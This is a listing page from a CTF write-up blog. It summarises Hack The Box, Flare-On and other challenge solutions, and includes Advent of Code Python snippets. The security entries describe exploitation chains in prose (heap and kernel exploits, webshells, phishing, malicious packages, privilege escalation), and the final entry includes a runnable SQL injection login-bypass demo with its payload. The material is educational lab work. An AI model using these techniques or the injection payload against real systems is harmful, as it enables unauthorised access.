HTB: RopeTwoctf htb-ropetwo hackthebox pwn python c javascript v8 d8 gef pwngdb reverse-engineering ghidra gdb xss heap pwntools realloc fake-chunk tcache unsorted-bin main-arena fsop free-hook heapinfo kernel-pwn kernel-debug rop kernel-rop kaslr ropgadget stack-pivot prepare-kernel-cred commit-creds apport htb-traceback apt http-proxy cve-2020-8831 wasm wasm-fiddle htb-playertwo
RopeTwo, much like Rope, was just a lot of binary exploitation. It starts with a really neat attack on Google’s v8 JavaScript engine, with a couple of newly added vulnerable functions to allow out of bounds read and write. I’ll use that with an XSS vulnerability in the website to get code execution and a shell. To privesc to user, I’ll use a heap exploit in a SUID binary. The binary was very limiting in the way I could interact with the heap, which led to my having to re-write my exploit from scratch several times. From user, I’ll escalate again by attacking a kernel module that created a vulnerable device. I’ll leak the kernel memory to get past KASLR, and use some common kernel exploit techniques to execute a ROP chain and return a root shell. In Beyond Root, I’ll look at the unintended method used to get first blood on this box.
Holiday Hack 2020: 'Zat You, Santa Claus? featuring KringleCon 3: French Hensctf sans-holiday-hack
The 2020 SANS Holiday Hack Challenge was less of a challenge to figure out who did it, and more about picking apart how Jack Frost managed to hack Santa’s processes. This all takes place at the third annual KringleCon, where the world’s leading security practitioners show up for talks and challenges. Hosted back at a currently-being-renovated North Pole, this year’s conference included 13 talks from leaders in information security, as well as 12 terminals / in-game puzzles and 11 objectives to solve. In solving all of these, Jack Frost’s plot was foiled. As usual, the challenges were interesting and set up in such a way that it was very beginner friendly, with lots of hints and talks to ensure that you learned something while solving.
HTB: Omnictf htb-omni hackthebox windows-iot-core sirep sireprat powershell-credential secretsdump penglab hashcat chisel credentials windows-device-portal oscp-like
Omni looks like a normal Windows host at first, but it’s actually Windows IOT Core, the flavor of Windows that will run on a Raspberry Pi. I’ll abuse Sirep protocol to get code execution as SYSTEM. From there, I’ll get access as both the app user and as administrator to decrypt the flags in each of their home directories. I’ll show multiple ways to get the user’s credentials.
Hackvent 2020 - leet(ish)ctf hackvent polyglot binwalk jsnice python chef docker docker-tar steghide tomcat cve-2020-9484 ysoserial deserialization elf reverse-engineering ghidra lru-cache ios itunes itunes-backup2hashcat fonepaw rsa rsactftool wireshark pcap
Hackvent 2020 - Hardctf hackvent xls excel forensic cbc crypto gimp polyglot mbr ghidra ida bochs python flask command-injection injection rubiks stl rubik-cube ja3 go ja3transport jwt ecryptfs hashcat ecryptfs2john pyyaml yaml-deserialization binwalk
The first seven hard challenges included my favorite challenge of the year, Santa’s Special GIFt, where the given file is both a GIF image and a master boot record. Handling it as such allowed me to reverse the code and emulate it to get two flags. There’s another challenge that looks at the failures of CBC on encrypting a raw bitmap image, three web exploitation challenges exploiting command injection, JA3 impersonation, and Python YAML deserialization, and another Rubik’s cube to solve.
Hackvent 2020 - Mediumctf hackvent rubiks py222 pil scrambles python dnspy perl obfuscation ssti jinja2 flask werkzeug-debug colb networkx graphs cliques mobilefish rsa crypto wiener mpz
Medium continues with another seven challenges over seven days. There’s a really good crypto challenge involving recovering RSA parameters recovered from a PCAP file and submitted to a Wiener attack, web hacking through a server-side template injection, dotNet reversing, a Rubik’s cube challenge, and what is becoming the annual obfuscated Perl game.
Hackvent 2020 - Easyctf hackvent encoding gimp python stegsolve steganography cyberchef crypto known-plaintext bkcrack binwalk steghide
Hackvent started out early with a -1 day released on 29 November. There were seven easy challenges, including -1, one hidden, and five daily challenges. These challenges were heavy in crypto, image editing / steg, and encoding. My favorite in the group was Chinese Animals, where I spent way more time figuring out what was going on after solving than actually solving.
Advent of Code 2020: Day 25ctf advent-of-code python modular-arithmetic
Day 25 is an encryption problem using modular arithmetic. I’m given two public keys, both of which are of the form 7^d mod 20201227, where d is unknown. The challenge is to find each d.
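Since the modulus is small, a brute-force discrete log is enough; a minimal sketch (my own code, not the post’s, and the example key is made up):

```python
def find_loop_size(pubkey, subject=7, mod=20201227):
    # Brute-force the discrete log: smallest d with subject^d % mod == pubkey
    value, d = 1, 0
    while value != pubkey:
        value = (value * subject) % mod
        d += 1
    return d

# hypothetical key built from a known exponent, just to show it round-trips
assert find_loop_size(pow(7, 8, 20201227)) == 8
```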
Advent of Code 2020: Day 24ctf advent-of-code python
The twist on day 24 is that it takes place on a grid of hexagons, so each tile has six neighbors, and a normal x,y or r,c coordinate system will be very difficult to use. I’ll use an x, y, z coordinate system to flip tiles based on some input and then watch it evolve based on its neighbors.
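A sketch of the cube-coordinate walk (my own code, checked against the puzzle’s example paths):

```python
# cube-coordinate offsets for the six hex directions (x + y + z == 0 always)
HEX_DIRS = {
    'e':  (1, -1, 0), 'w':  (-1, 1, 0),
    'ne': (1, 0, -1), 'sw': (-1, 0, 1),
    'nw': (0, 1, -1), 'se': (0, -1, 1),
}

def walk(path):
    """Follow a direction string like 'esenee' and return the final cube coordinate."""
    x = y = z = 0
    i = 0
    while i < len(path):
        # 'e' and 'w' are one character; 'ne', 'nw', 'se', 'sw' are two
        d = path[i] if path[i] in 'ew' else path[i:i + 2]
        dx, dy, dz = HEX_DIRS[d]
        x, y, z = x + dx, y + dy, z + dz
        i += len(d)
    return (x, y, z)

assert walk("esenee") == (3, -3, 0)   # net three steps east
assert walk("nwwswee") == (0, 0, 0)   # loops back to the reference tile
```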
Advent of Code 2020: Day 23ctf advent-of-code python
Today is another game. This time I’m given a list of numbers and asked to mix it according to some given rules a certain number of times. Today is also the first time this year where I wrote part one, and then completely started over given part two.
Advent of Code 2020: Day 22ctf advent-of-code python
I’m asked to play out a game between two players that in part one looks like the classic card game of war, and in part two goes off in a different direction of “recursive combat”. Both parts came together pretty quickly, though part two had a few places where small mistakes were hard to track down.
Advent of Code 2020: Day 21ctf advent-of-code python
Day 21 was welcome relief after day 20. In this one, I’ll parse a list of foods, each with an ingredients list and a listing of some (not necessarily all) of the allergens. I’ll use that list to pair up allergens to ingredients.
Advent of Code 2020: Day 20ctf advent-of-code python
Day 20 was almost the end of my 2020 Advent of Code. I managed to solve part one in 15 minutes, but then part two got me for days. I finally solved it, but I can’t promise pretty code.
Advent of Code 2020: Day 19ctf advent-of-code python
Another day with a section of convoluted validation rules and a series of items to be validated. Today’s rules apply to a string, and I’ll actually use a recursive algorithm to generate a single regex string that can then be applied to each input to check validity. It gets slightly more difficult in the second part, where loops are introduced into the rules. In order to work around this, I’ll guess at a depth at which I can start to ignore further loops.
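A minimal sketch of that recursive regex build (my own code; the depth cap is a stand-in for how I ignore further loops):

```python
import re

def build_regex(rules, key="0", depth=0, max_depth=15):
    # Expand rule `key` into a single regex string; the depth cap stops
    # the looping rules of part two from recursing forever.
    if depth > max_depth:
        return ""
    rule = rules[key]
    if rule.startswith('"'):
        return rule.strip('"')
    alts = ["".join(build_regex(rules, k, depth + 1, max_depth) for k in alt.split())
            for alt in rule.split(" | ")]
    return "(?:" + "|".join(alts) + ")"

# rule set from the puzzle's first example
rules = {"0": "1 2", "1": '"a"', "2": "1 3 | 3 1", "3": '"b"'}
pattern = re.compile(build_regex(rules) + "$")
assert pattern.match("aab") and pattern.match("aba")
assert not pattern.match("abb")
```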
HTB: Laserctf hackthebox htb-laser nmap ubuntu jetdirect pret printer crypto python proto3 grpc solr cve-2019-17558 gopher pspy sshpass socat tunnel htb-playertwo htb-travel
Laser starts without the typical attack paths, offering only SSH and two unusual ports. One of those is a printer, which gives the opportunity to leak data including a print job and the memory with the encryption key for that job. The PDF gives details of how the second port works, using protocol buffers over gRPC. I’ll use this spec to write my own client, and use that to build a port scanner and scan the box for other open ports on localhost. When I find Apache Solr, I’ll create another exploit to go through the gRPC service and send a POST request using Gopher to exploit Solr and get code execution and a shell. To escalate to root, I’ll collect SSH credentials for the root user in a container, and then use socat to redirect a cron SCP and SSH job back at the host box and exploit that to get code execution and root.
Advent of Code 2020: Day 18ctf advent-of-code python
Day 18 is reimplementing a simple math system with addition, multiplication, and parentheses, where the order of operations changes. I’ll write a single calc function that takes in the string to evaluate as well as the order of operations to apply.
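A sketch of such a calc function for the part-one rules, where + and * share precedence (my own code, simplified: part two would need the configurable ordering the post describes):

```python
import re

def calc(expr):
    """Evaluate + and * left-to-right with equal precedence, honoring parentheses."""
    tokens = re.findall(r'\d+|[+*()]', expr)

    def parse(i):
        total, op = 0, '+'
        while i < len(tokens) and tokens[i] != ')':
            t = tokens[i]
            if t in '+*':
                op = t
            else:
                if t == '(':
                    val, i = parse(i + 1)   # recurse; returns at the ')'
                else:
                    val = int(t)
                total = total + val if op == '+' else total * val
            i += 1
        return total, i

    return parse(0)[0]

assert calc("1 + 2 * 3 + 4 * 5 + 6") == 71   # puzzle's example
assert calc("2 * 3 + (4 * 5)") == 26
```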
Advent of Code 2020: Day 17ctf advent-of-code python conway game-of-life
Day 17 was a modified version of Conway’s Game of Life, played across three and four dimensions, where a cell’s state in the next time step is determined by its current state and the state of its neighbors.
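The neighbor counting generalizes nicely with a Counter over active cells; my own sketch of the 3-D case, checked against the example’s part-one answer of 112:

```python
from collections import Counter
from itertools import product

def step(active):
    """One generation of 3-D Conway: `active` is a set of (x, y, z) cells."""
    counts = Counter(
        (x + dx, y + dy, z + dz)
        for x, y, z in active
        for dx, dy, dz in product((-1, 0, 1), repeat=3)
        if (dx, dy, dz) != (0, 0, 0)
    )
    # active stays active with 2 or 3 neighbors; inactive activates with exactly 3
    return {c for c, n in counts.items() if n == 3 or (n == 2 and c in active)}

# the puzzle's example start grid, placed on the z=0 plane
grid = [".#.", "..#", "###"]
cells = {(x, y, 0) for y, row in enumerate(grid)
         for x, c in enumerate(row) if c == "#"}
for _ in range(6):
    cells = step(cells)
assert len(cells) == 112
```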
Advent of Code 2020: Day 16ctf advent-of-code python
Day 16 was an interesting one to think about, as the algorithm for solving it wasn’t obvious. It wasn’t the case like some of the previous ones where there was an intuitive way to think about it but it would take too long. It was more a case of wrapping your head around the problem and how to organize the data so that you could match keys to values using validity rules and a bunch of examples. I made a guess that the data might clean up nicely in a certain way, and when it did, it made the second part much easier.
Advent of Code 2020: Day 15ctf advent-of-code python defaultdict
Day 15 is a game the elves play, where you have to remember the numbers said in a list, and append the next number based on when it was previously said. I’ll solve by storing the numbers not in a list and searching it each time, but rather in a dictionary of lists, where the key is the number and the value is a list of indexes. It still runs a bit slow in part two, but it works.
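A sketch of the game (my own version, with slightly different bookkeeping than described: it keeps only the last turn each number was said, which avoids the slowdown of searching lists):

```python
def memory_game(start, turns):
    """Play the elves' memory game for `turns` turns and return the last number said."""
    # last turn each number was spoken (excluding the most recent)
    last = {n: i + 1 for i, n in enumerate(start[:-1])}
    current = start[-1]
    for turn in range(len(start), turns):
        # new number → 0; otherwise gap since it was last said
        nxt = turn - last[current] if current in last else 0
        last[current] = turn
        current = nxt
    return current

assert memory_game([0, 3, 6], 10) == 0     # puzzle example
assert memory_game([0, 3, 6], 2020) == 436
```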
Advent of Code 2020: Day 14ctf advent-of-code python
Part one of day 14 looked to be some basic binary masking and manipulation. But in part two, it got trickier, as now I need to handle Xs in the mask as both 0 and 1, meaning that there would be 2^(number of Xs) results. I used a recursive function to generate the list of indexes there.
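A sketch of that recursive expansion (my own code, run against the puzzle’s part-two example of mask X1001X applied to address 42):

```python
def addresses(mask, addr):
    """Yield every address produced by a floating-bit mask (part-two rules)."""
    # 1s in the mask force bits on; X positions float
    addr |= int(mask.replace('X', '0'), 2)
    floats = [i for i, c in enumerate(reversed(mask)) if c == 'X']

    def expand(a, bits):
        if not bits:
            yield a
            return
        b, rest = bits[0], bits[1:]
        yield from expand(a & ~(1 << b), rest)  # X taken as 0
        yield from expand(a | (1 << b), rest)   # X taken as 1

    yield from expand(addr, floats)

mask = "000000000000000000000000000000X1001X"
assert sorted(addresses(mask, 42)) == [26, 27, 58, 59]
```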
Advent of Code 2020: Day 13ctf advent-of-code python chinese-remainder-theorem
Day 13 is looking at a series of buses that are running on their own time cycles, and trying to find times where the buses arrive in certain patterns. It brings in a somewhat obscure number theory concept called the Chinese Remainder Theorem, which has to do with solving a series of modular linear equations that all equal the same value.
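The CRT step can be sketched like this (my own minimal implementation; the three-argument `pow` modular inverse needs Python 3.8+):

```python
from functools import reduce

def crt(remainders, moduli):
    """Solve x ≡ r_i (mod m_i) for pairwise-coprime moduli."""
    M = reduce(lambda a, b: a * b, moduli)
    x = 0
    for r, m in zip(remainders, moduli):
        p = M // m
        x += r * p * pow(p, -1, m)  # pow(p, -1, m) is the modular inverse
    return x % M

# classic example: x ≡ 2 mod 3, x ≡ 3 mod 5, x ≡ 2 mod 7  →  23
assert crt([2, 3, 2], [3, 5, 7]) == 23
```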
HTB: OpenKeySctf htb-openkeys hackthebox nmap vim bsd openbsd gobuster php auth-userokay cve-2019-19521 cve-2019-19520 cve-2019-19522 shared-object skey cve-2020-7247 htb-onetwoseven
OpenKeyS was all about a series of OpenBSD vulnerabilities published by Qualys in December 2019. I’ll enumerate a web page to find a vim swap file that provides some hints about how the login form is doing auth. I’ll use that to construct an attack that allows me to bypass the authentication and log in as Jennifer, retrieving Jennifer’s SSH key. To root, I’ll exploit two more vulnerabilities, first to get access to the auth group using a shared library attack on xlock, and then abusing S/Key authentication. In Beyond Root, I’ll look at another OpenBSD vulnerability that was made public just after the box was released, and play with PHP and the $_REQUEST variable.
Advent of Code 2020: Day 12ctf advent-of-code python
Day 12 is about moving a ship across a coordinate plane using directions and a way point that moves and rotates around the ship. There’s a bit of geometry, and I made a really dumb mistake that took me a long time to figure out.
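The rotation is the fiddly geometry; a sketch of the waypoint turn (my own helper, taking y as positive north and only multiples of 90°):

```python
def rotate(wx, wy, degrees):
    """Rotate the waypoint clockwise about the ship in 90-degree steps."""
    for _ in range((degrees // 90) % 4):
        wx, wy = wy, -wx   # one clockwise quarter turn: (x, y) -> (y, -x)
    return wx, wy

# puzzle example: waypoint 10 east, 4 north; R90 makes it 4 east, 10 south
assert rotate(10, 4, 90) == (4, -10)
assert rotate(4, -10, 270) == (10, 4)   # three rights undo one right
```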
Advent of Code 2020: Day 11ctf advent-of-code python
Day 11 is a grid-based challenge, where I’m given a grid of floor, empty seats, and occupied seats, and asked to step through time using rules that define how a seat will be occupied at time t+1 given its state and the state of its neighbors at time t. My code gets really ugly today, but it solves.
Advent of Code 2020: Day 10ctf advent-of-code python lru-cache
Day 10 is about looking at a list of numbers. In the first part I’ll just need to make a histogram of the differences between the numbers when sorted. For part two, it’s the first challenge this year where I’ll need to come up with an efficient algorithm to handle it. I’m asked to come up with the number of valid combinations according to some constraints. I’ll use recursion to solve it, and it only works in reasonable time with caching on that recursion.
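The cached recursion can be sketched like this (my own version; the adapter list is the puzzle’s small example, which has 8 valid arrangements):

```python
from functools import lru_cache

def count_arrangements(adapters):
    """Count chains from the outlet (0) to the highest adapter in 1-3 jolt steps."""
    jolts = sorted(adapters)
    target = jolts[-1]
    valid = set(jolts)

    @lru_cache(maxsize=None)
    def count(j):
        if j == target:
            return 1
        # an adapter can connect to anything 1-3 jolts higher
        return sum(count(j + d) for d in (1, 2, 3) if j + d in valid)

    return count(0)

assert count_arrangements([16, 10, 15, 5, 1, 11, 7, 19, 6, 12, 4]) == 8
```

Without the `lru_cache`, the same recursion revisits every suffix exponentially many times; with it, each jolt value is computed once.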
Advent of Code 2020: Day 9ctf advent-of-code python
Day 9 is two challenges about looking across lists of ints to find pairs or slices with a given sum.
Advent of Code 2020: Day 8ctf advent-of-code python
Today I’m asked to build a small three-instruction computer, and parse a series of instructions (puzzle input). I’m told that the instructions form an infinite loop, which is easy to identify in this simple computer any time an instruction is executed a second time. I’ll look at finding where that infinite loop is entered, as well as finding the one instruction that can be patched to fix the code. I’ll create a class for the computer with the thinking that I might be coming back to use it again and build on it later.
Advent of Code 2020: Day 7ctf advent-of-code python lru-cache defaultdict
Day 7 gives me a list of bags, and what bags must go into those bags. The two parts are based on looking for what can hold what and how many. I’ll use defaultdicts to manage the rules, and two recursive functions (including one that benefits from lru_cache) to solve the parts.
Advent of Code 2020: Day 6ctf advent-of-code python
Day 6 was another text parsing challenge, breaking the input into groups and then counting across the users within each group. Both parts were similar, with the first counting if any user said yes to a given question, and the latter if every user said yes to a given question. Python makes this a breeze either way.
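The set logic really is a breeze; my own sketch of a per-group counter (“any” is part one, “all” is part two):

```python
def count_group(group, mode):
    """Count questions answered yes by any (part 1) or every (part 2) person in a group."""
    answers = [set(person) for person in group.split("\n")]
    merged = set.union(*answers) if mode == "any" else set.intersection(*answers)
    return len(merged)

assert count_group("abc", "any") == 3
assert count_group("ab\nac", "any") == 3   # a, b, c across the group
assert count_group("ab\nac", "all") == 1   # only 'a' is shared
```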
HTB: Unbalancedhtb-unbalanced hackthebox ctf nmap squid http-proxy foxy-proxy rsync encfs john gobuster squidclient xpath-injection python pihole webshell upload credentials password-reuse htb-joker htb-zetta
Unbalanced starts with a Squid proxy and RSync. I’ll use RSync to pull back the files that underpin an Encrypted Filesystem (EncFS) instance, and crack the password to gain access to the backup config files. In those files I’ll find the Squid config, which includes the internal site names, as well as the creds to manage the Squid. Looking at the proxy stats, I can find two internal IPs, and guess the existence of a third, which is currently out of order for security fixes. In the site on the third IP, I’ll find XPath injection allowing me to leak a bunch of usernames and passwords, one of which provides SSH access to the host. I’ll get into a Pi-hole container using an exploit to upload a webshell, and find a script which contains the root creds for the host. In Beyond Root, I’ll look at why the searchsploit version of the Pi-hole exploit didn’t work.
Advent of Code 2020: Day 5ctf advent-of-code python
Day 5 is wrapped in a story about plane ticket seat finding, but really it boils down to a simple binary to integer conversion, and then finding the difference of two sets and cleaning up what’s left based on some simple rules.
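The conversion really is just a character substitution (my own sketch, using the puzzle’s example seat):

```python
def seat_id(code):
    # F/L → 0, B/R → 1; the whole ten-character code is one binary number
    bits = code.translate(str.maketrans("FBLR", "0101"))
    return int(bits, 2)

assert seat_id("FBFBBFFRLR") == 357   # row 44, column 5 in the puzzle's example
```

Treating the full string as one number works because seat ID is row * 8 + column, and the three column bits are exactly the low bits.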
Advent of Code 2020: Day 4ctf advent-of-code python regex
Day 4 presented another text parsing challenge. In the first part, I just needed to validate if each section contained seven specific strings, which is easy enough to solve in Python. For part two, I need to now look at the text following each of these strings, and apply some validation rules. At first I thought I’d throw out my part 1 work and start processing all the data into a Python dict. But then I realized I could just write a regex for each validation, and use the same pattern.
Advent of Code 2020: Day 3ctf advent-of-code python
Advent of Code always dives into visual mapping in a way that makes you conceptualize 2D (or 3D) space and move through it. I’ve got a map that represents a slope with clear spaces and trees, and that repeats moving to the right. As this is an early challenge, it’s still relatively simple to handle the map with just an array of strings, which I’ll do to count the trees I encounter on different trajectories moving across the map.
Advent of Code 2020: Day 2ctf advent-of-code python
Day 2 was about processing lines that contained two numbers, a character, and a string which is referred to as a password. Both parts are about using the numbers and the character to determine if the password is “valid”. How the numbers and character become a rule is different in parts 1 and 2.
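Both rule interpretations fit in a few lines; my own sketch, checked against the puzzle’s example lines:

```python
import re

LINE = re.compile(r"(\d+)-(\d+) (\w): (\w+)")

def valid_part1(line):
    # numbers are a min/max count for the character
    lo, hi, ch, pw = LINE.match(line).groups()
    return int(lo) <= pw.count(ch) <= int(hi)

def valid_part2(line):
    # numbers are 1-indexed positions; exactly one must hold the character
    a, b, ch, pw = LINE.match(line).groups()
    return (pw[int(a) - 1] == ch) != (pw[int(b) - 1] == ch)

assert valid_part1("1-3 a: abcde") and not valid_part1("1-3 b: cdefg")
assert valid_part2("1-3 a: abcde") and not valid_part2("2-9 c: ccccccccc")
```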
Advent of Code 2020: Day 1ctf advent-of-code python
Advent of Code is an annual set of programming challenges released daily through December, and it’s a favorite of mine to practice. There are 25 days to collect 50 stars. For Day 1, the puzzle was basically reading a list of numbers, and looking through them for a pair and a set of three that summed to 2020. For each part, I’ll multiply the identified numbers together to get the solution.
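The pair search is a classic two-sum; my own sketch using the puzzle’s example list:

```python
def find_pair(nums, target=2020):
    """Return the product of the two entries summing to target, or None."""
    seen = set()
    for n in nums:
        if target - n in seen:
            return n * (target - n)
        seen.add(n)
    return None

# puzzle example: 1721 + 299 == 2020, and 1721 * 299 == 514579
assert find_pair([1721, 979, 366, 299, 675, 1456]) == 514579
```

The set makes it a single O(n) pass instead of checking every pair.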
HTB: SneakyMailerhtb-sneakymailer ctf hackthebox nmap wfuzz vhosts gobuster phishing swaks htb-xen imap smtp evolution webshell php pypi hashcat htpasswd setup-py htb-chaos htb-canape sudo pip service oscp-like
SneakyMailer starts with web enumeration to find a list of email addresses, which I can use along with SMTP access to send phishing emails. One of the users will click on the link, and return a POST request with their login creds. That provides access to the IMAP inbox for that user, where I’ll find creds for FTP. The FTP access is in the web directory, and while there’s nothing interesting there, I can write a webshell and get execution, and a shell. To privesc, I’ll submit a malicious Python package to the local PyPi server, which provides execution and a shell as that user. For root, I’ll abuse a sudo rule to run pip, installing the same package again. In Beyond Root, I’ll look at the automation on the box running as services.
HTB: Buffctf hackthebox htb-buff nmap windows gobuster gym-management-system searchsploit cloudme chisel msfvenom webshell defender oscp-like
Buff is a really good OSCP-style box, where I’ll have to identify a web software running on the site, and exploit it using a public exploit to get execution through a webshell. To privesc, I’ll find another service I can exploit using a public exploit. I’ll update with my own shellcode to make a reverse shell, and set up a tunnel so that I can connect to the service that listens only on localhost. From there, the exploit script returns an administrator shell. In Beyond Root, I’ll step through the first script and perform the exploit manually, and look at how Defender was blocking some of my attempts.
HTB: Intensehtb-intense ctf hackthebox nmap snmp snmpwalk sqli injection sqlite python burp bruteforce penglab cookies hash-extension hash-extender directory-traversal snmp-shell tunnel bof logic-error htb-rope gdb peda
Intense presented some cool challenges. I’ll start by finding a SQL injection vulnerability into an SQLite database. I’m able to leak the admin hash, but not crack it. Using the source code for the site, I’ll see that if I can pull off a hash extension attack, I can use the hash to trick the site into providing admin access. From there, I’ll use a directory traversal bug in a log reading API to find SNMP read/write creds, which I’ll use to get a shell with snmp-shell. I can use that to find a custom binary listening on localhost, as well as its source code. I’ll use the snmp account to create an SSH tunnel, and exploit a logic bug in the code to overflow the buffer, bypass protections, and get a shell as root. In Beyond Root, I’ll look at the trouble I had with the system libc call in my ROP, figure out why, and fix it.
HTB: Tabby
Tabby was a well designed easy level box that required finding a local file include (LFI) in a website to leak the credentials for the Tomcat server on that same host. The user whose creds I gain access to only has access to the command line manager API, not the GUI, but I can use that to upload a WAR file, get execution, and a shell. I’ll crack the password on a backup zip archive and then use that same password to change to the next user. That user is a member of the lxd group, which allows them to start containers. I’ve shown this root before, but this time I’ll include a really neat trick from m0noc that saves several steps. In Beyond Root, I’ll pull apart the WAR file and show what’s actually in it.
Flare-On 2020: breakflare-on ctf flare-on-break reverse-engineering ghidra ptrace hook ldpreload pre-main gdb crypto feistel-cipher unpack modinv python htb-mischief htb-obscurity htb-teacher htb-popcorn htb-lightweight htb-sunday
break was an amazing challenge. Just looking at main, it looks like a simple comparison against a static flag. But there’s an init function that runs first, forking a child process that then attaches a debugger to the parent, hooking all of its system calls and crashes. The child itself forks a second child, which attaches to the first child, handling several intentional crash points in the first child’s code. This effectively prevents my debugging the parent or first child, as only one debugger can attach at a time. I’ll use two different approaches - hooking library calls and patching the second child’s functionality directly into the first child, allowing me to debug the first child. Using these techniques, I’ll wind through three parts of the flag, each successively more difficult to break out.
Flare-On 2020: crackinstallerflare-on ctf flare-on-crackinstaller reverse-engineering capcom-sys driver kernel-debug
crackinstaller.exe was a complicated binary that installed the Capcom.sys driver, and then exploited it to load another driver into memory. It also dropped and installed another DLL, a credential helper. I used kernel debugging to see how the second driver is loaded, and eventually find a password, which I can feed into the credential helper to get the flag. I spent over two of the six weeks working on crackinstaller.exe, and unfortunately, I stopped taking meaningful notes very early in that process, so this won’t be much of a writeup, but rather a high level overview.
Flare-On 2020: Aardvarkflare-on ctf flare-on-aardvark reverse-engineering wsl ghidra resource-hacker process-hacker gdb peda pwndbg
Aardvark was a game of tic-tac-toe where the computer always goes first, and can’t lose. Instead of having the decision logic of the computer in the program, it drops an ELF binary to act as the computer, and communicates with it over a unix socket, all of which is possible on Windows with the Windows Subsystem for Linux (WSL). Once I understand how the computer is playing, I’ll modify the computer’s logic so that I can win, and get the flag. I’ll play with different ways to patch the binary, starting manually with gdb, and moving to patching the ELF resource a couple of different ways.
HTB: Fusectf htb-fuse hackthebox windows ldap ldapsearch rpc smb winrm evil-winrm crackmapexec smbmap rpcclient papercut gobuster cewl hydra smbpasswd rpcclient capcom-sys driver visual-studio eoploaddriver msfvenom scheduled-task ghidra oscp-like
Fuse was all about pulling information out of a printer admin page. I’ll collect usernames and use cewl to make a wordlist, which happens to find the password for a couple accounts. I’ll need to change the password on the account to use it, and then I can get RPC access, where I’ll find more creds in the comments. I can use those creds for WinRM access, where I’ll find myself with privileges to load a driver. I’ll use the popular Capcom.sys driver to load a payload that returns a shell as system. In Beyond Root, I’ll look at the scheduled tasks that are managing the users’ passwords and trying to uninstall drivers put in place by HTB players.
Flare-On 2020: RE Crowdflare-on ctf flare-on-re-crowd reverse-engineering pcap wireshark tshark cve-2017-7269 shellcode scdbg crypto python x64dbg cff-explorer cyberchef procmon
RE Crowd was a different kind of reversing challenge. I’m given a PCAP that includes someone trying to exploit an IIS webserver using CVE-2017-7269. This exploit uses alphanumeric shellcode to run on success. I’ll pull the shellcode and analyze it, seeing that it’s a Metasploit loader that connects to a host and then the host sends back an encrypted blob. The host then sends another encrypted blob back to the attacker. I’ll use what I can learn about the attacker’s commands to decrypt that exfil and find the flag.
Flare-On 2020: CodeItflare-on ctf flare-on-codeit reverse-engineering autoit exe2aut upx myauttoexe script-obfuscation crypto
The sixth Flare-On7 challenge was tricky in a way that’s hard to put on the page. It really was just an AutoIt script wrapped in a Windows exe. I’ll use a tool to revert it back to a large, obfuscated script, and then get to work deobfuscating it. Eventually I’ll see that it is looking for a specific hostname, and on switching my hostname to match, I get a QR code that contains the flag.
Flare-On 2020: TKAppflare-on ctf flare-on-tkapp reverse-engineering tizen tpk dnspy dotnet emulation python
Flare-On 2020: report.xlsflare-on ctf flare-on-report reverse-engineering xls vba olevba evil-clippy pcode vba-stomp python pcodedmp pcode2code script-obfuscation
Flare-On 2020: wednesdayflare-on ctf flare-on-wednesday reverse-engineering ghidra nimlang x64dbg patching
Flare-On 2020: garbageflare-on ctf flare-on-garbage upx pe cff-explorer ghidra reverse-engineering resource-hacker
garbage was all about understanding the structure of an exe file, and how to repair it when the last few hundred bytes were truncated. I’ll troubleshoot the binary and eventually get it working to the point that I can unpack it, do static analysis, and get the flag. I’ll also show how to fix the binary so that it will just run and print the flag in a message box.
Flare-On 2020: Fidlerflare-on ctf flare-on-fidler python pygame reverse-engineering
HTB: Dyplesherhackthebox ctf htb-dyplesher nmap memcached gobuster gogs git gitdumper memcached-binary memcached-auth memcached-cli memcat credentials git-bundle sqlite hashcat bukkit minecraft spigot intellij java jar webshell packet-capture wireshark cuberite rabbitmq amqp-publish lua htb-canape htb-waldo htb-dab
Dyplesher used several modern technologies that aren’t common in the CTFs I’ve done. Initial access requires finding a virtual host with a .git directory that allows me to find the credentials used for the memcache port. After learning about the binary memcache protocol that supports authentication, I’m able to connect and dump usernames and passwords from the cache, which provide access to a Gogs instance. In Gogs, I’ll find four git bundles (repo backups), one of which contains custom code with an SQLite db containing password hashes. One cracks, providing access to the web dashboard. In this dashboard, I’m able to upload and run Bukkit plugins. I’ll write a malicious one that successfully writes both a webshell and an SSH key, both of which provide access to the box as the same first user. This user has access to a dumpcap binary, which I’ll use to capture traffic, finding RabbitMQ message queue traffic that contains the username and password for the next user. This user has instructions to send a URL over the messaging queue, which will cause the box to download and run a Cuberite plugin. I’ll figure out how to publish my host into the queue, and write a malicious Lua script that will provide root access. In Beyond Root, I’ll look more deeply at the binary memcache protocol.
HTB: Blunderhtb-blunder hackthebox ctf nmap ubuntu bludit cms searchsploit github cewl bruteforce python upload filter credentials crackstation cve-2019-14287 sudo oscp-like htaccess
Blunder starts with a blog that I’ll find is hosted on the BludIt CMS. Some version enumeration and looking at releases on GitHub shows that this version is vulnerable to a bypass of the bruteforce protections, as well as an upload-and-execute filter bypass on the PHP site. I’ll write my own scripts for each of these, and use them to get a shell. From there, I’ll find creds for the next user, where I’ll find the first flag. Now I can also check sudo, where I’ll see I can run sudo to get a bash shell as any non-root user. I’ll exploit CVE-2019-14287 to run that as root, and get a root shell.
HTB: Cachectf htb-cache hackthebox nmap ubuntu gobuster vhosts javascript credentials password-reuse wfuzz openemr searchsploit auth-bypass sqli injection sqlmap hashcat memcached docker htb-dab htb-olympus
Cache rates as medium based on the number of steps, none of which are particularly challenging. There’s a fair amount of enumeration of a website, first, to find a silly login page that has hardcoded credentials that I’ll store for later, and then to find a new VHost that hosts a vulnerable OpenEMR system. I’ll exploit that system three ways, first to bypass authentication, which provides access to a page vulnerable to SQL injection, which I’ll use to dump the hashes. After cracking the hash, I’ll exploit the third vulnerability with a script from ExploitDB which provides authenticated code execution. That RCE provides a shell. I’ll escalate to the next user by reusing the creds from the hardcoded website. I’ll find creds for the next user in memcached. This user is in the docker group, which I’ll exploit to get root access.
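Auth-bypass SQL injection like the first OpenEMR bug can be demoed in a few lines. This sketch uses SQLite and a made-up users table rather than OpenEMR’s real schema; the payload style is the classic comment-out-the-password-check trick:

```python
import sqlite3

# Toy demo (not OpenEMR's actual code): a login query built by string
# concatenation is injectable.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")

def login(username, password):
    # VULNERABLE: user input is interpolated directly into the SQL
    query = (f"SELECT username FROM users WHERE "
             f"username = '{username}' AND password = '{password}'")
    return conn.execute(query).fetchone()

# Normal use fails without the password...
print(login("admin", "wrong"))          # None
# ...but the injection comments out the password check entirely
print(login("admin' -- ", "anything"))  # ('admin',)
```

The fix, of course, is parameterized queries (`?` placeholders), which is also why sqlmap-style dumping works once any such string-built query is found.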
